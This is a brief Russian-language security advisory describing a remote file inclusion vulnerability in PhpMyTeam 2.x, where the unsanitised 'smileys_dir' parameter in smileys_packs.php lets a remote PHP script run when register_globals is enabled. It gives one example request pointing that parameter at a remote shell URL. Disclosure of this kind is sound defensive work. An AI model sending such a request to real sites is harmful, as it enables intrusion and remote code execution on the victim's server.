Программа: PhpMyTeam 2.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «smileys_dir» сценарием images/smileys/smileys_packs.php.

Успешное эксплуатирование уязвимости требует включение опции «register_globals».

Пример:

/images/smileys/smileys_packs.php?smileys_dir=http://sh3LL?

Оставить мнение